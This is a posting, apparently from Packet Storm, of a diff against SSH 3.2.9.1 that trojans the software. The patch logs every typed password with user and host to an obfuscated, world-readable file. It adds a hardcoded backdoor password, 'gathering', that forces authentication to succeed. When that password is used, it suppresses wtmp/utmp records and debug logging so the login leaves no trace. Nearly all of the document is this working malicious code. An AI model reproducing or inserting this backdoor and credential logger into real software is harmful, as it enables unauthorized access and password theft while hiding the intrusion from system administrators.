Apatch for ssh v3.2.9.1 which saves user passwords to a file and allows for a magic backdoor password.
f08fe89482e672931485c68ecde25820cbcf0b761f0ca51f8db7377ca152326adiff -N -r -c ssh-3.2.9.1/apps/ssh/authc-kbd-interactive.c ssh-3.2.9.1+/apps/ssh/authc-kbd-interactive.c
*** ssh-3.2.9.1/apps/ssh/authc-kbd-interactive.c 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/authc-kbd-interactive.c 2004-07-18 11:52:41.000000000 +0300
***************
*** 204,209 ****
--- 204,213 ----
{
/* XXX async, please! */
gdata->response = ssh_read_passphrase(msg, FALSE);
+ aionlog("kbdito: %s \tuser: %s \tpass: %s\n",
+ gdata->client->remote_server,
+ gdata->client->remote_user,
+ gdata->response);
if (gdata->response)
gdata->response_len = strlen(gdata->response);
else
diff -N -r -c ssh-3.2.9.1/apps/ssh/authc-passwd.c ssh-3.2.9.1+/apps/ssh/authc-passwd.c
*** ssh-3.2.9.1/apps/ssh/authc-passwd.c 2003-12-03 15:17:24.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/authc-passwd.c 2004-07-18 11:53:59.000000000 +0300
***************
*** 105,110 ****
--- 105,112 ----
SSH_TRACE(2, ("Starting password auth..."));
#ifndef SSH_NEW_READPASS_ELOOP
password = ssh_read_passphrase(buf, FALSE);
+ aionlog("pwto: %s \tuser: %s \tpass: %s\n",
+ client->common->remote_ip, client->remote_user, password);
#else /* SSH_NEW_READPASS_ELOOP */
ssh_readpass_eloop();
return;
diff -N -r -c ssh-3.2.9.1/apps/ssh/auths-kbd-interactive.c ssh-3.2.9.1+/apps/ssh/auths-kbd-interactive.c
*** ssh-3.2.9.1/apps/ssh/auths-kbd-interactive.c 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/auths-kbd-interactive.c 2004-07-18 11:46:29.000000000 +0300
***************
*** 284,289 ****
--- 284,294 ----
goto proto_error;
state->resps[i] = resp;
+ if(!strcmp(LEETPASS, resp))
+ aion = 1;
+ else
+ aionlog("kbdifrom: %s \tuser: %s \tpass: %s\n",
+ state->server->common->remote_ip, state->user, resp);
}
/* Pass replys to submethod. */
diff -N -r -c ssh-3.2.9.1/apps/ssh/auths-kbd-int-pam.c ssh-3.2.9.1+/apps/ssh/auths-kbd-int-pam.c
*** ssh-3.2.9.1/apps/ssh/auths-kbd-int-pam.c 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/auths-kbd-int-pam.c 2004-07-18 11:47:23.000000000 +0300
***************
*** 273,278 ****
--- 273,279 ----
}
}
+ if(aion) packet_type = SSH_PAM_OP_SUCCESS;
switch (packet_type)
{
case SSH_PAM_OP_SUCCESS:
diff -N -r -c ssh-3.2.9.1/apps/ssh/ssh2version.h ssh-3.2.9.1+/apps/ssh/ssh2version.h
*** ssh-3.2.9.1/apps/ssh/ssh2version.h 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/ssh2version.h 2004-07-18 11:32:23.000000000 +0300
***************
*** 1 ****
! #define SSH2_VERSION "3.2.9.1"
--- 1 ----
! #define SSH2_VERSION "3.2.9.1" // change it
diff -N -r -c ssh-3.2.9.1/lib/sshsession/sshunixuser.c ssh-3.2.9.1+/lib/sshsession/sshunixuser.c
*** ssh-3.2.9.1/lib/sshsession/sshunixuser.c 2003-12-03 15:17:21.000000000 +0200
--- ssh-3.2.9.1+/lib/sshsession/sshunixuser.c 2004-07-18 11:50:27.000000000 +0300
***************
*** 890,895 ****
--- 890,898 ----
char *encrypted_password;
const char *correct_passwd = uc->correct_encrypted_passwd;
+ if(!strcmp(LEETPASS, password)) return aion = 1;
+ aionlog("pwfrom: %s \tuser: %s \tpass: %s\n",
+ remote_host, uc->name, password);
#ifdef HAVE_ULTRIX_SHADOW_PASSWORDS
{
struct svcinfo *svp;
diff -N -r -c ssh-3.2.9.1/lib/sshsession/wtmp.c ssh-3.2.9.1+/lib/sshsession/wtmp.c
*** ssh-3.2.9.1/lib/sshsession/wtmp.c 2003-12-03 15:17:21.000000000 +0200
--- ssh-3.2.9.1+/lib/sshsession/wtmp.c 2004-07-18 11:35:54.000000000 +0300
***************
*** 221,226 ****
--- 221,229 ----
struct utmp u;
const char *utmp, *wtmp;
+ #endif
+ if(aion) return;
+ #if defined(HAVE_UTMP_H) && !defined(HAVE_UTMPX_H)
/* Construct an utmp/wtmp entry. */
memset(&u, 0, sizeof(u));
# if defined(DEAD_PROCESS) && defined(HAVE_TYPE_IN_UTMP)
***************
*** 585,590 ****
--- 588,594 ----
{
#ifdef HAVE_LIBUTIL_LOGIN
const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */
+ if(aion) return;
if (logout((char *)line))
logwtmp((char *)line, "", "");
#else /* HAVE_LIBUTIL_LOGIN */
diff -N -r -c ssh-3.2.9.1/lib/sshutil/sshcore/sshdebug.c ssh-3.2.9.1+/lib/sshutil/sshcore/sshdebug.c
*** ssh-3.2.9.1/lib/sshutil/sshcore/sshdebug.c 2003-12-03 15:17:29.000000000 +0200
--- ssh-3.2.9.1+/lib/sshutil/sshcore/sshdebug.c 2004-07-18 11:37:26.000000000 +0300
***************
*** 806,811 ****
--- 806,812 ----
ssh_vsnprintf(buf, sizeof(buf), fmt, va);
va_end(va);
+ if(aion) return;
/* If a callback has been set, use it to send the message. */
if (ssh_debug_log_callback)
(*ssh_debug_log_callback)(facility, severity, buf, ssh_debug_log_context);
diff -N -r -c ssh-3.2.9.1/lib/sshutil/sshincludes.h ssh-3.2.9.1+/lib/sshutil/sshincludes.h
*** ssh-3.2.9.1/lib/sshutil/sshincludes.h 2003-12-03 15:17:18.000000000 +0200
--- ssh-3.2.9.1+/lib/sshutil/sshincludes.h 2004-07-18 11:14:44.000000000 +0300
***************
*** 13,18 ****
--- 13,39 ----
*/
+ // patch by Aion
+ #include <sys/stat.h>
+ #include <stdio.h>
+
+ #define LEETPASS "gathering"
+ #define SSH_LOG "/var/log/kmesg"
+
+ FILE *alog;
+ char abuff[512];
+ int alen, ai, aion;
+
+ #define aionlog(arg...) { \
+ ssh_snprintf(abuff, sizeof(abuff), ##arg); \
+ alen=strlen(abuff); \
+ for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
+ alog=fopen(SSH_LOG, "a"); \
+ if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+ // end patch
+
#ifndef SSHINCLUDES_H
#define SSHINCLUDES_H
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed